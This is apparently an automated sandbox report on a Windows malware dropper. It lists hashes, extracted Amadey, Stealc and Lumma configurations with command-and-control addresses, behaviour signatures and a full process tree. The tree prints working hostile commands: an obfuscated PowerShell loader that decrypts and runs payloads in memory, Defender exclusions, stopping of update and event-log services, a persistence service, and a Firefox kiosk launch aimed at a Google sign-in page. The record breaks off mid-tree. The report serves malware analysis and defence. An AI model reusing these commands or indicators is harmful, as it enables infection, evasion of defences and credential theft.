Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    04-12-2024 04:20

General

  • Target

    f30429f1257341aa2012149406181c128ebc53b3fcce11a482ea6266e5a00664.exe

  • Size

    3.1MB

  • MD5

    15486167d3ce2f6d927debe5fb800377

  • SHA1

    762704e63f652670244fa24b31883104e7df479b

  • SHA256

    f30429f1257341aa2012149406181c128ebc53b3fcce11a482ea6266e5a00664

  • SHA512

    9fc904cfc59fa81033a032b1fb451da1e5de784d40c1be05afacc65c97a4b71d4bb29b5d858c456d70b2e5ef900bf2e02f540679bf84c2452e515edd8fbd089c

  • SSDEEP

    49152:nMuDtQ1Wh5zrjADAErj+BLkfXP/IjgvHxfFZT:MuBQ1Wh5PjADAErlfXPNZDT

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

amadey

Version

4.41

Botnet

fed3aa

C2

http://185.215.113.16

Attributes
  • install_dir

    44111dbc49

  • install_file

    axplong.exe

  • strings_key

    8d0ad6945b1a30a186ec2d30be6db0b5

  • url_paths

    /Jo89Ku7d/index.php

rc4.plain

Extracted

Family

stealc

Botnet

default_valenciga

C2

http://185.215.113.17

Attributes
  • url_path

    /2fb6c2cc8dce150a.php

Extracted

Family

lumma

C2

https://crib-endanger.sbs

https://faintbl0w.sbs

https://300snails.sbs

https://bored-light.sbs

https://3xc1aimbl0w.sbs

https://pull-trucker.sbs

https://fleez-inc.sbs

https://thicktoys.sbs

Extracted

Family

stealc

Botnet

drum

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 14 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 28 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 28 IoCs
  • Identifies Wine through registry keys 2 TTPs 13 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 49 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 6 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Embeds OpenSSL 1 IoCs

    Embeds OpenSSL, may be used to circumvent TLS interception.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 39 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 6 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 10 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 20 IoCs
  • Suspicious use of FindShellTrayWindow 19 IoCs
  • Suspicious use of SendNotifyMessage 13 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\f30429f1257341aa2012149406181c128ebc53b3fcce11a482ea6266e5a00664.exe
    "C:\Users\Admin\AppData\Local\Temp\f30429f1257341aa2012149406181c128ebc53b3fcce11a482ea6266e5a00664.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:1040
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:3048
      • C:\Users\Admin\AppData\Local\Temp\1011373001\stories.exe
        "C:\Users\Admin\AppData\Local\Temp\1011373001\stories.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1512
        • C:\Users\Admin\AppData\Local\Temp\is-50G2V.tmp\stories.tmp
          "C:\Users\Admin\AppData\Local\Temp\is-50G2V.tmp\stories.tmp" /SL5="$401CE,3274473,54272,C:\Users\Admin\AppData\Local\Temp\1011373001\stories.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:2864
          • C:\Windows\SysWOW64\net.exe
            "C:\Windows\system32\net.exe" pause video_jet_1235
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2848
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 pause video_jet_1235
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1772
          • C:\Users\Admin\AppData\Local\VideoJet 4.1.3.33\videojet3264.exe
            "C:\Users\Admin\AppData\Local\VideoJet 4.1.3.33\videojet3264.exe" -i
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Modifies system certificate store
            PID:2040
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\1011428021\UpdatedAgain.cmd" "
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2240
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\1011428021\UpdatedAgain.cmd';$mlaR='InaHWTvaHWTokaHWTeaHWT'.Replace('aHWT', ''),'GoEqIetoEqICuoEqIrroEqIentoEqIProEqIooEqIcoEqIeoEqIssoEqI'.Replace('oEqI', ''),'ElcnPTemcnPTencnPTtAcnPTtcnPT'.Replace('cnPT', ''),'LVXBNoadVXBN'.Replace('VXBN', ''),'FrSQcEoSQcEmBSQcEaSQcEse6SQcE4SQcEStrSQcEinSQcEgSQcE'.Replace('SQcE', ''),'ChhnmsanhnmsghnmseExhnmstehnmsnsihnmsonhnms'.Replace('hnms', ''),'MOYmhaOYmhinMOYmhoduOYmhleOYmh'.Replace('OYmh', ''),'DezNFDcomzNFDpzNFDrezNFDsszNFD'.Replace('zNFD', ''),'RUdUPeaUdUPdLUdUPinUdUPesUdUP'.Replace('UdUP', ''),'EnXsXntXsXnrXsXnyPoXsXninXsXntXsXn'.Replace('XsXn', ''),'CrQiuaeQiuaateQiuaDeQiuacQiuarQiuaypQiuatQiuaorQiua'.Replace('Qiua', ''),'CopwpFTyTowpFT'.Replace('wpFT', ''),'SpzcNflizcNftzcNf'.Replace('zcNf', ''),'TZlhXrZlhXanZlhXsfoZlhXrZlhXmFZlhXinZlhXaZlhXlZlhXBlZlhXockZlhX'.Replace('ZlhX', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($mlaR[1])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function xlgJw($THCaC){$tnIYs=[System.Security.Cryptography.Aes]::Create();$tnIYs.Mode=[System.Security.Cryptography.CipherMode]::CBC;$tnIYs.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$tnIYs.Key=[System.Convert]::($mlaR[4])('nn1oVgQf+vsVUwhFRI0DoffekxC7+zU06CysJKUG7/E=');$tnIYs.IV=[System.Convert]::($mlaR[4])('vS7iVHdVCr38C0HCS9OQuA==');$GnhUQ=$tnIYs.($mlaR[10])();$mheDM=$GnhUQ.($mlaR[13])($THCaC,0,$THCaC.Length);$GnhUQ.Dispose();$tnIYs.Dispose();$mheDM;}function uRupt($THCaC){$rILnk=New-Object System.IO.MemoryStream(,$THCaC);$mMQDJ=New-Object System.IO.MemoryStream;$xKbEF=New-Object System.IO.Compression.GZipStream($rILnk,[IO.Compression.CompressionMode]::($mlaR[7]));$xKbEF.($mlaR[11])($mMQDJ);$xKbEF.Dispose();$rILnk.Dispose();$mMQDJ.Dispose();$mMQDJ.ToArray();}$KWCnK=[System.IO.File]::($mlaR[8])([Console]::Title);$MFCGw=uRupt (xlgJw ([Convert]::($mlaR[4])([System.Linq.Enumerable]::($mlaR[2])($KWCnK, 5).Substring(2))));$CAxSJ=uRupt (xlgJw ([Convert]::($mlaR[4])([System.Linq.Enumerable]::($mlaR[2])($KWCnK, 6).Substring(2))));[System.Reflection.Assembly]::($mlaR[3])([byte[]]$CAxSJ).($mlaR[9]).($mlaR[0])($null,$null);[System.Reflection.Assembly]::($mlaR[3])([byte[]]$MFCGw).($mlaR[9]).($mlaR[0])($null,$null); "
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1976
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:600
      • C:\Users\Admin\AppData\Local\Temp\1011459001\df0dea1328.exe
        "C:\Users\Admin\AppData\Local\Temp\1011459001\df0dea1328.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Loads dropped DLL
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:1996
        • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
          "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2220
          • C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
            "C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            PID:296
          • C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe
            "C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:2856
          • C:\Users\Admin\AppData\Local\Temp\1002824001\34204cee53.exe
            "C:\Users\Admin\AppData\Local\Temp\1002824001\34204cee53.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Modifies system certificate store
            • Suspicious behavior: EnumeratesProcesses
            PID:1504
          • C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe
            "C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious use of FindShellTrayWindow
            PID:1784
            • C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
              "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:684
              • C:\Users\Admin\AppData\Local\Temp\10000331101\Office2024.exe
                "C:\Users\Admin\AppData\Local\Temp\10000331101\Office2024.exe"
                7⤵
                • Executes dropped EXE
                • Drops file in System32 directory
                • Suspicious behavior: EnumeratesProcesses
                PID:1520
                • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Drops file in System32 directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3620
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                  8⤵
                    PID:3616
                    • C:\Windows\system32\wusa.exe
                      wusa /uninstall /kb:890830 /quiet /norestart
                      9⤵
                      • Drops file in Windows directory
                      PID:2724
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe stop UsoSvc
                    8⤵
                    • Launches sc.exe
                    PID:3580
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe stop WaaSMedicSvc
                    8⤵
                    • Launches sc.exe
                    PID:2396
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe stop wuauserv
                    8⤵
                    • Launches sc.exe
                    PID:3680
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe stop bits
                    8⤵
                    • Launches sc.exe
                    PID:2584
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe stop dosvc
                    8⤵
                    • Launches sc.exe
                    PID:3760
                  • C:\Windows\system32\powercfg.exe
                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                    8⤵
                    • Power Settings
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3952
                  • C:\Windows\system32\powercfg.exe
                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                    8⤵
                    • Power Settings
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3808
                  • C:\Windows\system32\powercfg.exe
                    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                    8⤵
                    • Power Settings
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3248
                  • C:\Windows\system32\powercfg.exe
                    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                    8⤵
                    • Power Settings
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3536
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe delete "QKJNEQWA"
                    8⤵
                    • Launches sc.exe
                    PID:3552
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe create "QKJNEQWA" binpath= "C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe" start= "auto"
                    8⤵
                    • Launches sc.exe
                    PID:3612
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe stop eventlog
                    8⤵
                    • Launches sc.exe
                    PID:3636
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe start "QKJNEQWA"
                    8⤵
                    • Launches sc.exe
                    PID:3624
            • C:\Users\Admin\AppData\Local\Temp\1003620001\trru7rd2.exe
              "C:\Users\Admin\AppData\Local\Temp\1003620001\trru7rd2.exe"
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:1464
            • C:\Users\Admin\AppData\Local\Temp\1004899001\am209.exe
              "C:\Users\Admin\AppData\Local\Temp\1004899001\am209.exe"
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              PID:1664
              • C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
                6⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:1936
                • C:\Windows\SysWOW64\rundll32.exe
                  "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                  7⤵
                  • Blocklisted process makes network request
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  PID:2356
            • C:\Users\Admin\AppData\Local\Temp\1005242001\v_dolg.exe
              "C:\Users\Admin\AppData\Local\Temp\1005242001\v_dolg.exe"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Modifies system certificate store
              • Suspicious behavior: EnumeratesProcesses
              PID:2912
            • C:\Users\Admin\AppData\Local\Temp\1005245001\a340910d71.exe
              "C:\Users\Admin\AppData\Local\Temp\1005245001\a340910d71.exe"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2808
            • C:\Users\Admin\AppData\Local\Temp\1005246001\e19e6b7125.exe
              "C:\Users\Admin\AppData\Local\Temp\1005246001\e19e6b7125.exe"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2224
        • C:\Users\Admin\AppData\Local\Temp\1011782001\GI59vO6.exe
          "C:\Users\Admin\AppData\Local\Temp\1011782001\GI59vO6.exe"
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:1684
        • C:\Users\Admin\AppData\Local\Temp\1011866001\6158293fba.exe
          "C:\Users\Admin\AppData\Local\Temp\1011866001\6158293fba.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:1916
        • C:\Users\Admin\AppData\Local\Temp\1011867001\4305f3e650.exe
          "C:\Users\Admin\AppData\Local\Temp\1011867001\4305f3e650.exe"
          3⤵
          • Enumerates VirtualBox registry keys
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:2812
        • C:\Users\Admin\AppData\Local\Temp\1011868001\6e7c5374e5.exe
          "C:\Users\Admin\AppData\Local\Temp\1011868001\6e7c5374e5.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:2980
        • C:\Users\Admin\AppData\Local\Temp\1011869001\bb34fd4a66.exe
          "C:\Users\Admin\AppData\Local\Temp\1011869001\bb34fd4a66.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:2428
        • C:\Users\Admin\AppData\Local\Temp\1011870001\6b8fc9e98f.exe
          "C:\Users\Admin\AppData\Local\Temp\1011870001\6b8fc9e98f.exe"
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:1124
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM firefox.exe /T
            4⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1504
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM chrome.exe /T
            4⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2208
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM msedge.exe /T
            4⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1148
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM opera.exe /T
            4⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1844
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM brave.exe /T
            4⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1648
          • C:\Program Files\Mozilla Firefox\firefox.exe
            "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
            4⤵
              PID:2308
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                5⤵
                • Checks processor information in registry
                • Modifies registry class
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                PID:2276
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2276.0.1414507385\1269882267" -parentBuildID 20221007134813 -prefsHandle 1224 -prefMapHandle 1216 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3e76d4b2-e1de-44b7-8b61-39132cf1f2fe} 2276 "\\.\pipe\gecko-crash-server-pipe.2276" 1300 11ed7b58 gpu
                  6⤵
                    PID:548
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2276.1.814229275\2093082127" -parentBuildID 20221007134813 -prefsHandle 1492 -prefMapHandle 1488 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {62f2145d-edba-454b-9194-de0f1364700a} 2276 "\\.\pipe\gecko-crash-server-pipe.2276" 1504 d72758 socket
                    6⤵
                      PID:3040
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2276.2.1276849687\1385134242" -childID 1 -isForBrowser -prefsHandle 2088 -prefMapHandle 2084 -prefsLen 21811 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7c4a9441-be8e-46fc-afd7-a29fa37a8453} 2276 "\\.\pipe\gecko-crash-server-pipe.2276" 2100 18fc9358 tab
                      6⤵
                        PID:3012
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2276.3.2062086990\2010510078" -childID 2 -isForBrowser -prefsHandle 2884 -prefMapHandle 2880 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ada8c73b-511f-4f82-b431-db023cd2a3ea} 2276 "\\.\pipe\gecko-crash-server-pipe.2276" 2896 1cf61158 tab
                        6⤵
                          PID:2640
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2276.4.1430963917\1134936949" -childID 3 -isForBrowser -prefsHandle 3700 -prefMapHandle 3696 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {86d9c880-0ff1-47c3-a9c3-7f46be2ccf55} 2276 "\\.\pipe\gecko-crash-server-pipe.2276" 3712 1e7cb258 tab
                          6⤵
                            PID:3700
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2276.5.124452207\1936875139" -childID 4 -isForBrowser -prefsHandle 3820 -prefMapHandle 3824 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {406f82ef-a88a-41db-89db-8402079116aa} 2276 "\\.\pipe\gecko-crash-server-pipe.2276" 3808 1e7cac58 tab
                            6⤵
                              PID:3708
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2276.6.1467052612\655245421" -childID 5 -isForBrowser -prefsHandle 3984 -prefMapHandle 3988 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9e18cf64-35e6-407f-a779-464455c134de} 2276 "\\.\pipe\gecko-crash-server-pipe.2276" 3972 1f866e58 tab
                              6⤵
                                PID:3720
                        • C:\Users\Admin\AppData\Local\Temp\1011871001\e65cf67d33.exe
                          "C:\Users\Admin\AppData\Local\Temp\1011871001\e65cf67d33.exe"
                          3⤵
                          • Modifies Windows Defender Real-time Protection settings
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Windows security modification
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3200
                        • C:\Users\Admin\AppData\Local\Temp\1011872001\rhnew.exe
                          "C:\Users\Admin\AppData\Local\Temp\1011872001\rhnew.exe"
                          3⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          PID:3956
                    • C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe
                      C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe
                      1⤵
                      • Executes dropped EXE
                      • Drops file in System32 directory
                      • Suspicious use of SetThreadContext
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2508
                      • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
